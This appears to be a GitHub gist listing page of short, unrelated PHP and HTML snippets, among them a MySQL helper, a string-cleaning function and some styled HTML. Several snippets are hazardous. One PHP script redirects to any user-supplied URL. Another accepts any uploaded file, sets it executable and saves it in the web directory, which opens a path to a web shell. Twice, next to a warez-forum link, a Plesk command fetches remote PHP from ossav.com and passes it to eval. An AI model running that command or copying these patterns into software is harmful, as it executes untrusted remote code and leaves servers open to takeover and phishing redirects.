This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function mysqli_result($res, $row=0, $col=0){ | |
| $numrows = mysqli_num_rows($res); | |
| if ($numrows && $row <= ($numrows-1) && $row >=0){ | |
| mysqli_data_seek($res,$row); | |
| $resrow = (is_numeric($col)) ? mysqli_fetch_row($res) : mysqli_fetch_assoc($res); | |
| if (isset($resrow[$col])) { | |
| return $resrow[$col]; | |
| } | |
| } | |
| return false; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function clean($text) { | |
| $text=str_replace('/','',$text); | |
| $text=str_replace('*','',$text); | |
| $text=str_replace('+','',$text); | |
| $text=str_replace('-',' ',$text); | |
| $text=str_replace('_',' ',$text); | |
| $text=str_replace('=','',$text); | |
| $text=str_replace('`','',$text); | |
| $text=str_replace('"','',$text); | |
| $text=str_replace("'",'',$text); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/teekyar/phix/ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <html> | |
| <head> | |
| <title> TAGTEACH </title> | |
| <style> | |
| h1{ | |
| background-color: wheat; | |
| font-size: 100px; | |
| text-align: center; | |
| } | |
| </style> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <p>Hi,<span style='color:red;'>I'm</span>a <span style='color:blue;'>Professional</span> Developer!</p> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $url=$_GET['url']; | |
| if(!empty($url)){ | |
| header('Location: '.$url); | |
| //Content | |
| }else{ | |
| echo 'URL Is Empty!'; | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| $file=$_FILES['file']; | |
| chmod($file["tmp_name"],755); | |
| move_uploaded_file($file["tmp_name"],__DIR__.'/'.$file['name']); | |
| ?> | |
| <form method="post" enctype="multipart/form-data"> | |
| <input type="file" name="file" /> | |
| <input type="submit" name="submit" /> | |
| </form> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://babiato.co/threads/plesk-onyx-web-host-edition.17223/page-5 | |
| plesk php -er "eval(file_get_contents('http://ossav.com/PTC'));" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| plesk php -er "eval(file_get_contents('http://ossav.com/PTC'));" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| apt update && upgrade -y | |
| do-release-upgrade |
OlderNewer